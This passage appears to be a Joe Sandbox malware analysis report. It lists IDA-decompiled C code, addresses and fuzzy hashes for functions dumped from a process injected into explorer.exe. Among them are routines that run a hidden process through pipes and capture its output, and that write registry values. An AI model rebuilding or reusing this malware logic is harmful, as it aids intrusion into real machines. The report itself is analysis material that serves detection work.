						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E00088706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x909b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














                  0x00092125
                  0x0009212a
                  0x0009212e
                  0x0009212e
                  0x00092133
                  0x00092138
                  0x00092139
                  0x0009213c
                  0x0009213d
                  0x00092142
                  0x00092145
                  0x00092146
                  0x0009214b
                  0x00092152
                  0x000921f8
                  0x000921f8
                  0x00000000
                  0x00092161
                  0x00092161
                  0x00092168
                  0x0009216c
                  0x00092173
                  0x0009217c
                  0x0009217e
                  0x0009217e
                  0x0009217c
                  0x0009218d
                  0x000921b3
                  0x000921bc
                  0x000921be
                  0x000921c4
                  0x000921f3
                  0x000921f3
                  0x000921fb
                  0x000921fe
                  0x000921fe
                  0x000921c6
                  0x000921c7
                  0x000921cd
                  0x000921cf
                  0x000921cf
                  0x000921d4
                  0x000921d3
                  0x000921d3
                  0x000921db
                  0x000921e7
                  0x000921f1
                  0x000921f1
                  0x00000000
                  0x0009219d
                  0x0009219d
                  0x0009219d
                  0x000921a3
                  0x00000000
                  0x00000000
                  0x000921a5
                  0x000921ab
                  0x000921b0
                  0x00000000
                  0x000921b0
                  0x0009218d

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: strchr$_snprintflocaleconv
                  • String ID: %.*g
                  • API String ID: 1910550357-952554281
                  • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                  • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
                  • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                  • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000902B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: _snprintfqsort
                  • String ID: %I64d$false$null$true
                  • API String ID: 756996078-4285102228
                  • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                  • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
                  • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                  • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00084A0B, Relevance: 9.3, APIs: 6, Instructions: 285stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x9e688; // 0xb0000
					_t125 =  *0x9e68c; // 0x293fab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E0008BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E0008B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E0008B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
					E0008B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000892E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000891E3(_v1112);
								_t145 = _t130;
								 *0x9e740 = _t76;
								 *0x9e738 = E000891E3(_t145);
								L17:
								_push(_t145);
								_t188 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x9b9ca);
								E00089F48(0xe);
								E00089F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E0008A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E0008A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E0008A3ED(_t188, _t180, _t208);
								}
								_t87 = E0008980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E0008A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E0008E23E(_t183);
										}
										E000852C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x9e688; // 0xb0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E0008109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000885D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xb0228
									_t153 = _t51;
									L25:
									_t90 = E0008553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x9e688; // 0xb0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E0008C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x9e684; // 0x293f8f0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x9e684; // 0x293f8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E0008861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E0008861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E0008E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000895E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000885D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00082BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}































































                  0x00084a0b
                  0x00084a18
                  0x00084a23
                  0x00084a28
                  0x00084a2a
                  0x00084a2d
                  0x00084a32
                  0x00084a35
                  0x00084a3f
                  0x00084a41
                  0x00084a4e
                  0x00084a57
                  0x00084a57
                  0x00084a64
                  0x00084a7f
                  0x00084a86
                  0x00084a88
                  0x00084a8d
                  0x00084a92
                  0x00084a98
                  0x00084aa7
                  0x00084ac6
                  0x00084ac8
                  0x00084ace
                  0x00084ad4
                  0x00084ad9
                  0x00084add
                  0x00084ae0
                  0x00084aea
                  0x00084aec
                  0x00084aed
                  0x00084af8
                  0x00084afa
                  0x00084afd
                  0x00084b02
                  0x00084b09
                  0x00084b5e
                  0x00084b5e
                  0x00084b63
                  0x00084bca
                  0x00084bcf
                  0x00084bd1
                  0x00084bdb
                  0x00084be0
                  0x00084be0
                  0x00084bfa
                  0x00084bfc
                  0x00084bff
                  0x00084c01
                  0x00000000
                  0x00000000
                  0x00084c07
                  0x00084c11
                  0x00084c1a
                  0x00084c1f
                  0x00084c22
                  0x00084c28
                  0x00084c2e
                  0x00084c36
                  0x00084c38
                  0x00084c3b
                  0x00084c3c
                  0x00084c41
                  0x00084c44
                  0x00084c47
                  0x00084c49
                  0x00084c4d
                  0x00084c4d
                  0x00084c52
                  0x00084c55
                  0x00084c57
                  0x00084c5b
                  0x00084c5b
                  0x00084c62
                  0x00084c67
                  0x00084c69
                  0x00084c6d
                  0x00084c6f
                  0x00084c75
                  0x00084c79
                  0x00084c7c
                  0x00084c7d
                  0x00084c82
                  0x00084c85
                  0x00084c8a
                  0x00084cb2
                  0x00084cb8
                  0x00084cbf
                  0x00084cce
                  0x00084cd3
                  0x00000000
                  0x00084cd3
                  0x00084cc1
                  0x00000000
                  0x00084c8c
                  0x00084c8c
                  0x00084c91
                  0x00084c98
                  0x00084cdd
                  0x00084cdd
                  0x00084ce4
                  0x00084ce8
                  0x00084ce9
                  0x00084ce9
                  0x00084cf3
                  0x00084cf8
                  0x00084cfb
                  0x00084cfc
                  0x00084cfe
                  0x00084d00
                  0x00084d05
                  0x00084d0c
                  0x00084d4f
                  0x00084d0e
                  0x00084d13
                  0x00084d1b
                  0x00084d1f
                  0x00084d2a
                  0x00084d35
                  0x00084d3d
                  0x00084d41
                  0x00084d49
                  0x00084d49
                  0x00084d0c
                  0x00084d55
                  0x00084d58
                  0x00084d5a
                  0x00084d60
                  0x00084d60
                  0x00084d62
                  0x00084d62
                  0x00000000
                  0x00084d62
                  0x00084c9a
                  0x00084c9a
                  0x00084ca0
                  0x00084ca2
                  0x00084ca7
                  0x00084ca7
                  0x00084ca9
                  0x00084cd8
                  0x00000000
                  0x00084cd8
                  0x00084cab
                  0x00084ae4
                  0x00084ae4
                  0x00000000
                  0x00084ae4
                  0x00084c8a
                  0x00084b69
                  0x00084b77
                  0x00084b8a
                  0x00084b8f
                  0x00084b95
                  0x00084b97
                  0x00084baf
                  0x00084bb4
                  0x00084bbd
                  0x00084bc3
                  0x00000000
                  0x00084bc3
                  0x00084b9f
                  0x00084ba8
                  0x00000000
                  0x00084ba8
                  0x00084b0b
                  0x00084b11
                  0x00084b13
                  0x00084b51
                  0x00084b53
                  0x00000000
                  0x00000000
                  0x00084b55
                  0x00084b59
                  0x00000000
                  0x00084b59
                  0x00084b15
                  0x00084b1f
                  0x00084b2b
                  0x00084b36
                  0x00084b3d
                  0x00084b47
                  0x00084b4c
                  0x00000000
                  0x00084b4c
                  0x00084ae2
                  0x00000000
                  0x00084a66
                  0x00084a71
                  0x00084a77
                  0x00084a79
                  0x00084d64
                  0x00084d64
                  0x00084d66
                  0x00084d6c
                  0x00084d6c
                  0x00000000
                  0x00084a79

                  APIs
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: lstrcat$lstrcpy$memset
                  • String ID:
                  • API String ID: 1985475764-0
                  • Opcode ID: 488debc6cf7d0380203fb27e8d1cd97e5587ab3ac04a24f7c3db213fba28b1c0
                  • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
                  • Opcode Fuzzy Hash: 488debc6cf7d0380203fb27e8d1cd97e5587ab3ac04a24f7c3db213fba28b1c0
                  • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                  Download Yara Rule
                  APIs
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
                  • SysAllocString.OLEAUT32(?), ref: 0008D764
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D778
                  • SysFreeString.OLEAUT32(?), ref: 0008D7F3
                  • SysFreeString.OLEAUT32(?), ref: 0008D7F6
                  • SysFreeString.OLEAUT32(?), ref: 0008D7FB
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                  • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
                  • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                  • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000907F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$\u%04X$\u%04X\u%04X
                  • API String ID: 0-2132903582
                  • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                  • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
                  • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                  • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008D523, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 30%
                  			E0008D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00088604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                  0x0008d530
                  0x0008d533
                  0x0008d536
                  0x0008d547
                  0x0008d54d
                  0x0008d55e
                  0x0008d566
                  0x0008d5b7
                  0x0008d5b7
                  0x0008d5bc
                  0x0008d5c1
                  0x0008d5c1
                  0x0008d5c4
                  0x0008d5c9
                  0x0008d5ce
                  0x0008d5ce
                  0x0008d5d1
                  0x0008d568
                  0x0008d569
                  0x0008d56f
                  0x0008d580
                  0x0008d585
                  0x00000000
                  0x0008d587
                  0x0008d594
                  0x0008d59c
                  0x00000000
                  0x0008d59e
                  0x0008d5a0
                  0x0008d5a8
                  0x00000000
                  0x0008d5aa
                  0x0008d5ad
                  0x0008d5b3
                  0x0008d5b3
                  0x0008d5a8
                  0x0008d59c
                  0x0008d585
                  0x0008d5d6

                  APIs
                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                  • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D569
                  • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                  • String ID:
                  • API String ID: 1610782348-0
                  • Opcode ID: 032b65d1a8ed55fd57765c242025f7fd8b4177f10fda5a8d8732fc47c56a4ee4
                  • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
                  • Opcode Fuzzy Hash: 032b65d1a8ed55fd57765c242025f7fd8b4177f10fda5a8d8732fc47c56a4ee4
                  • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000921FF, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E000921FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000922CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L00092291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x98250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L00092291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x98258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











                  0x000921ff
                  0x00092207
                  0x0009220c
                  0x0009220f
                  0x00092214
                  0x0009221a
                  0x00092223
                  0x00092227
                  0x00092227
                  0x00092223
                  0x00092229
                  0x0009222e
                  0x00092237
                  0x0009223c
                  0x0009223f
                  0x00092248
                  0x0009224a
                  0x00092251
                  0x00092262
                  0x00092262
                  0x00092264
                  0x0009226c
                  0x00092273
                  0x00000000
                  0x0009226e
                  0x00092272
                  0x00092272
                  0x00092253
                  0x00092253
                  0x00092259
                  0x0009225b
                  0x00092260
                  0x00092276
                  0x00092279
                  0x0009227e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00092260

                  APIs
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: _errno$localeconvstrchrstrtod
                  • String ID:
                  • API String ID: 1035490122-0
                  • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                  • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
                  • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                  • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E0008A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E0008861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x9e684; // 0x293f8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x9e684; // 0x293f8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E00088604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x9e684; // 0x293f8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x9e684; // 0x293f8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x9e684; // 0x293f8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x9e684; // 0x293f8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000891A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00089292(_t127);
						E0008861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E0008C379(_t127));
				_t98 =  *0x9e68c; // 0x293fab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x9e684; // 0x293f8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x9e684; // 0x293f8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00089256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E0008861A( &_v32, 0);
				return _t128;
			}




































                  0x0008a9c2
                  0x0008a9c4
                  0x0008a9d0
                  0x0008a9d5
                  0x0008a9d8
                  0x0008a9da
                  0x0008a9dd
                  0x0008a9e0
                  0x0008a9e7
                  0x0008a9ea
                  0x0008a9f1
                  0x0008a9f4
                  0x0008a9fe
                  0x0008a9ff
                  0x0008aa02
                  0x0008aa04
                  0x0008aa05
                  0x0008aa1c
                  0x0008ab9c
                  0x00000000
                  0x0008ab9c
                  0x0008aa33
                  0x0008ab68
                  0x0008ab6e
                  0x0008ab79
                  0x0008ab7b
                  0x0008ab83
                  0x0008ab83
                  0x0008ab8a
                  0x0008ab8c
                  0x0008ab95
                  0x0008ab95
                  0x00000000
                  0x0008ab98
                  0x0008aa39
                  0x0008aa3c
                  0x0008aa3f
                  0x0008aa45
                  0x0008aa4f
                  0x0008aa59
                  0x0008aa60
                  0x0008aa69
                  0x0008aa6b
                  0x0008aa71
                  0x00000000
                  0x00000000
                  0x0008aa7c
                  0x0008aa83
                  0x0008aa84
                  0x0008aa89
                  0x0008aa8a
                  0x0008aa8b
                  0x0008aa90
                  0x0008aa92
                  0x0008aa93
                  0x0008aa94
                  0x0008aa97
                  0x0008aa9d
                  0x00000000
                  0x00000000
                  0x0008aaa3
                  0x0008aaab
                  0x0008aaae
                  0x0008aab6
                  0x0008aab9
                  0x0008aabc
                  0x0008aac2
                  0x0008aad6
                  0x0008aadc
                  0x0008aae2
                  0x0008ab0b
                  0x0008aae4
                  0x0008aae4
                  0x0008aae6
                  0x0008aae8
                  0x0008aaf0
                  0x0008aaf8
                  0x0008aafd
                  0x0008aafd
                  0x0008ab11
                  0x0008ab13
                  0x0008ab13
                  0x0008ab1b
                  0x0008ab23
                  0x0008ab24
                  0x0008ab29
                  0x0008ab32
                  0x0008ab52
                  0x0008ab52
                  0x0008ab5a
                  0x0008ab5d
                  0x0008ab65
                  0x00000000
                  0x0008ab65
                  0x0008ab3b
